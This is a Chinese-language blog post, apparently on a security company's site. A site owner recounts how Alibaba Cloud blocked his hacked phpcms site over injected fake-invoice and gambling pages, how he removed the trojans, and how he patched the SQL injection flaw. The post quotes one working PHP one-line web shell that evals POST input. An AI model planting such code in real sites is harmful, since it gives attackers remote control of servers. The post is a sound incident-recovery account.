eSafe白帽駭客資安網-網絡安全背後的巨人,提供駭客,網站入侵測試,網站被駭,網站漏洞,駭客入侵,資訊安全,入侵,ecshop,wordpress,漏洞修復,木馬清除,資安服務

阿里雲 違規URL屏蔽訪問處理通知的解決

     
        都說阿里雲的主機特別的穩定,價格還實惠,多年續費還打8折,心動已久。

2017年初正式把網站遷移到阿里雲主機上,備好案,一切正常運行,網站訪問速度比之前的西部數碼真的是快了好多倍啊,不愧是馬雲家的東西。
 
3月15日上午,手機突然收到了阿里雲的短信,提示我網站涉及違法不良信息被阿里雲屏蔽訪問處理。腦子頓時有點蒙圈,趕緊打開網站看一看,網站已經無法訪問了,心情糟糕透了。

QQ郵箱也收到了阿里雲的提示郵件,《違規URL屏蔽訪問處理通知》,如下圖所示:



尊敬的用戶:

您的網站URL:http://www.hifi.com.cn/content-80-3006-1.html涉及違法不良信息,違反了相關服務協議和《互聯網信息服務管理辦法》第十五條規定,目前阿里雲已對您的違法URL做屏蔽訪問處理。

如果您對本通知的內容存有疑問,請及時工單或者電話聯繫我們, 謝謝您對阿里雲的支持。
 
查看您網站涉及違禁商品類 -> 證件卡票

風險類型:違禁商品類-證件卡票

1、您需要將您的網站違法文件,違法頁面進行徹底整改刪除。(包括但不限於我們通知的內容)

2、需要您在公安備案平台 http://www.beian.gov.cn 申請公安備案,截圖並工單反饋申請開通。

 
特別注意:

第一次(7天累計違規網頁達100條) 阻斷域名完全整改、公安平台提交網站備案、參加網站安全管理考試及培訓。
 
第二次7天累計超過100條,我們會再次關停您的網站,並取消您的帳號參加阿里雲平台全年營銷活動的資格,阻斷域名且1年內禁止參加阿里雲平台營銷活動。
 
第三次我們將永久關停您的網站不再提供解鎖申請,並且您的帳號取消購買資格,後期將無法再在阿里雲平台進行任何產品購買。
 
打開阿里雲所說的鏈接地址:http://www.hifi.com.cn/content-80-3006-1.html

網站提示:該內容被禁止訪問





看了阿里雲的通知,我才意識到問題的嚴重性,在7天內不及時處理,網站就可能永久的被封了,停止訪問了,我續了3年的主機啊。大體瞭解了為什麼阿里雲會屏蔽

訪問處理我的網站,從頭到尾我把問題的解決過程記錄到我的日誌裡,希望能幫到更多遇到同樣情況的站長們。
 
第一步:首先看一下網站的百度的收錄情況。



百度裡site:網站,看到網站收錄都是一些代開發票的信息,還有一些博彩類的惡意內容。

點擊快照,竟然直接給跳轉到別人的網站上去了,我這才意識到原來是我網站被駭了,網站的程序代碼都被駭客篡改了,趕緊登陸主機檢查程序代碼。

content-80-3006-1.html 這個文件也存在於網站跟目錄下,打開一看確實都是一些代開發票,博彩的內容。又發現網站的根目錄下多了一個php文件,名字也起的好特別。





裡面竟然還有什麼蠟筆小新,下面的代碼都是加了密的,具體的內容沒有看到,應該是駭客的木馬文件,我隨即刪除了這個文件,又在其他文件夾下查到了一句話木馬代碼。

<?php var_dump(md5(123));$content=stripslashes($_POST[1]);eval($content);
 
這個木馬的作用是POST提交,可以直接上傳任意文件到網站目錄下,並控制網站的權限。
 
在目錄下還查到有一個TXT文件,裡面竟然是代開發票的內容,終於找到問題的根本了。



把以上發現的木馬文件都刪除後,在阿里雲工單裡,提交了工單,抓緊讓阿里雲技術檢查一下,還有沒有了,大約1個小時內技術回復我的工單了,暫時已經解除網站屏蔽,網站現已正常訪問了。
 
至此,關於阿里雲阻斷域名,屏蔽處理我網站的問題,徹底的得以解決,從頭到尾又反思了一下整個問題的根本,為什麼駭客會黑了我的網站,而且還上傳了木馬文件,這問題的本質應該是我的網站是有漏洞,

才會被駭客攻擊。按照這個思路,網站用的是phpcms系統,百度搜索了下phpcms 漏洞,發現phpcms最近爆出了高危漏洞,SQL注入獲取管理員密碼的漏洞,原來是程序確實有漏洞了,看了大牛們文章修復方案,

本身我是搞程序設計的,自己根據修復方案,修復了網站的漏洞。
 
程序代碼上的漏洞,需要有安全意識,懂程序代碼的程序員才能修復的了,如果自己不懂程序代碼,也可以找一些安全公司來解決,國內網站安全方面,也就esafe.tw和綠盟等等安全公司比較專業。


分享:

相關推薦